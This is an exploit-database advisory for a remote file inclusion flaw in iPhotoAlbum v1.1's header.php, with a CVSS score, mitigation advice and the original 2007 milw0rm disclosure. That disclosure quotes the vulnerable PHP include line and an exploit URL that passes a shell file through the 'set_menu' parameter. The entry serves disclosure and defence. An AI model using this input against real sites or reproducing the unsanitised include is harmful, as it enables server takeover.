header-logo
Suggest Exploit
vendor:
iPhotoAlbum
by:
GloD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: iPhotoAlbum
Affected Version From: v1.1
Affected Version To: v1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

iPhotoAlbum v1.1 Remote File Include Vulnerability

The iPhotoAlbum v1.1 script is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a malicious file through the 'set_menu' parameter in the 'header.php' file. This can lead to arbitrary code execution.

Mitigation:

Upgrade to a newer version of the iPhotoAlbum script that has fixed this vulnerability. Alternatively, remove the 'set_menu' parameter from the 'header.php' file.
Source

Exploit-DB raw data:

# iPhotoAlbum v1.1(header.php)Remote File Include Vulnerability
# D.Script: http://sourceforge.net/projects/iphotoalbum/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code 
# <?php if(isset($set_menu)) { include("$set_menu"); } ?>
# Exploit:[Path]/lib/static/header.php?set_menu=SheLL
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx: w4ck1ng.com & h4cky0u.org &  t0pP8uZz 

# milw0rm.com [2007-03-28]